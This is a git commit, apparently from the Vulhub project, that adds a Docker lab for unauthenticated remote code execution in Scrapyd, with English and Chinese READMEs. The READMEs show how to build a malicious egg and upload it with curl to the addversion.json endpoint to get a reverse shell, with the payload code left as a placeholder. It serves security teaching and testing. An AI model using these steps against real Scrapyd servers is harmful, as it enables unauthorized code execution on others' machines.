first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
scrapy/scrapyd-unacc/1.png
Normal file
BIN
scrapy/scrapyd-unacc/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 43 KiB |
39
scrapy/scrapyd-unacc/README.md
Normal file
39
scrapy/scrapyd-unacc/README.md
Normal file
@@ -0,0 +1,39 @@
|
||||
# Scrapyd Pre-Auth Remote Code Execution
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Scrapyd is an application for deploying and running Scrapy spiders. It enables users to deploy (upload) projects and control their spiders using a JSON API.
|
||||
|
||||
References: <https://www.leavesongs.com/PENETRATION/attack-scrapy.html>
|
||||
|
||||
## Start server
|
||||
|
||||
Execution the following command to start a scrapyd server:
|
||||
|
||||
```bash
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After scrapyd is deployed, the server is listening on `http://your-ip:6800`.
|
||||
|
||||
## Reproduce
|
||||
|
||||
Build a evil egg archive:
|
||||
|
||||
```bash
|
||||
pip install scrapy scrapyd-client
|
||||
scrapy startproject evil
|
||||
cd evil
|
||||
# edit evil/__init__.py, add evil code
|
||||
scrapyd-deploy --build-egg=evil.egg
|
||||
```
|
||||
|
||||
Upload evil egg to the scrapyd server:
|
||||
|
||||
```bash
|
||||
curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg
|
||||
```
|
||||
|
||||
reverse shell is available:
|
||||
|
||||
|
||||
37
scrapy/scrapyd-unacc/README.zh-cn.md
Normal file
37
scrapy/scrapyd-unacc/README.zh-cn.md
Normal file
@@ -0,0 +1,37 @@
|
||||
# scrapyd 未授权访问漏洞
|
||||
|
||||
scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。
|
||||
|
||||
参考链接:<https://www.leavesongs.com/PENETRATION/attack-scrapy.html>
|
||||
|
||||
## 环境搭建
|
||||
|
||||
执行如下命令启动scrapyd服务:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,访问`http://your-ip:6800`即可看到Web界面。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
参考[攻击Scrapyd爬虫](https://www.leavesongs.com/PENETRATION/attack-scrapy.html),构造一个恶意的scrapy包:
|
||||
|
||||
```bash
|
||||
pip install scrapy scrapyd-client
|
||||
scrapy startproject evil
|
||||
cd evil
|
||||
# 编辑 evil/__init__.py, 加入恶意代码
|
||||
scrapyd-deploy --build-egg=evil.egg
|
||||
```
|
||||
|
||||
向API接口发送恶意包:
|
||||
|
||||
```bash
|
||||
curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg
|
||||
```
|
||||
|
||||
成功反弹shell:
|
||||
|
||||
|
||||
6
scrapy/scrapyd-unacc/docker-compose.yml
Normal file
6
scrapy/scrapyd-unacc/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
|
||||
version: '2'
|
||||
services:
|
||||
scrapyd:
|
||||
image: vulhub/scrapyd:1.2.1
|
||||
ports:
|
||||
- "6800:6800"
|
||||
Reference in New Issue
Block a user